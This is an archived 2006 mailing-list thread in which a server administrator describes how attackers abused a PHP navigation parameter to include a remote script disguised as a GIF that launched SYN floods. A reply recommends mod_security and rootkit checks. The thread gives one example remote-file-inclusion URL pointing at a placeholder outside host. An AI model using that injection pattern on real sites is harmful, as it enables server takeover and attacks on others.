Article 5822 at 06/06/21 09:36:09 From: toodi4 (at mark) hotmail.com Subject: [coba-e:05822] Re: syn flood issue and php

Index: [Article Count Order] [Thread]
Date:  Tue, 20 Jun 2006 17:37:15 -0700
From:  "Diana Saunders" <toodi4 (at mark) hotmail.com>
Subject:  [coba-e:05822] Re: syn flood issue and php
To:  coba-e (at mark) bluequartz.org
Message-Id:  <BAY102-F2838DB8A85FF47F7A3B72482840 (at mark) phx.gbl>
In-Reply-To:  <44986A6C.2030107 (at mark) swiftinter.net>
X-Mail-Count: 05822

>Diana Saunders wrote:
>>I started a thread last week regarding trying to block some IPs that I 
>>thought were sending a syn flood on my server.  The suggested action (IP 
>>Tables) didn't seem to help.
>>
>>It turns out the problem was a little different than I expected and I 
>>wanted to let everyone know exactly what was happening.
>>
>>What some was doing was running the following URLs on one of the server's 
>>sites:
>>
>>http://www.domainname.com/index.php?active=http://www.someotherdomain.com/filename.gif
>>
>>
>>But filename.gif is not a gif, it is a text file with a script that sends 
>>a synflood to some other server.
>>
>>The ?sctive=  part of the URL is the way the site was set up for 
>>navigation.  Although I design in PHP a lot, I haven't run across this 
>>particular navigation set up.  But in any event, it obviously opens the 
>>site to the kind of exploiting behavior it was getting.   I'm assuming 
>>some design software set the navigation up this way and that once this is 
>>taken out there shouldn't be a problem.
>>
>>Has anyone else run across this?
>

>Yep, a couple of times.
>
>Looks like they have used a phpupload script to plant a file on your 
>server. All in then takes is a few infected PC's to target that file and 
>launch the flood.
>
>Or in our case, loads of emails claiming to be from "voxcards.com.br"
>
>We eventually installed mod_security onto our servers in order to prevent a 
>lot of this rubbish from occurring. (www.gotroot.com) - the rules it uses 
>are quite good at blocking the phpupload attempts, although you will get 
>some false positives.
>
>
>Check your /tmp and /dev/shm for any other hidden surprises. If you have 
>chkrootkit or rkhunter installed, it might be a good idea to run that too.

Paul,

Actually, this isn't an upload issue.  That's what makes it different.  I've 
dealt with uploads and tmp folder issues in the past.  This server has safe 
mode enabled anyway.   In this case they are simply running a URL that is 
pulling a script into the browser from a completely foreign web site. I 
think the vulnerability is in the way the navigation is coded on the web 
site, allow people to pull in other pages as if they were part of the web 
site.  I know hackers use PHP to run commands on the server, but usually 
they can't get very far if they can't run wget or upload anything.

Di